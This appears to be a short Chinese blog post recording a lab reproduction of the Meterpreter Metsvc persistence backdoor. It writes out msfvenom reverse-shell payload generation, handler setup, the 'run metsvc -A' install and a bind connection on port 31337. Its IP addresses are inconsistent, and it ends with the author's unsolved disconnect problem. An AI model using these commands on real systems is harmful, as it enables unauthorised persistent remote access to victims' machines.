meterpreter后门-Metsvc的复现

一、msf生成后门并获得会话

攻击机ip：192.168.3.147 靶机ip：192.168.3.142

先生成一个exe的运行程序，并上传至靶机运行，然后用kali监听

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.47 LPORT=4444 -f exe -o /root/桌面/payload2.exe

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.100.130
set LPORT 4444
run

二、执行命令植入后门

在kali获得的会话中运行 run metsvc -A，完成后门植入

去靶机下查看目标文件夹发现上传成功

新建一个msf窗口，并依次运行命令

use exploit/multi/handler 
set payload windows/metsvc_bind_tcp 
set RHOST 192.168.3.142
set LPORT 31337

这里一直会话每次刚创建成功就会断开，查阅文章也没找到解决方法，各位大佬如果找到解决方法可以给小弟教学一波

posted @ 2020-04-04 22:45 BuFFERer 阅读(1490) 评论(1) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

BuFFERer

meterpreter后门-Metsvc的复现

一、msf生成后门并获得会话

二、执行命令植入后门

公告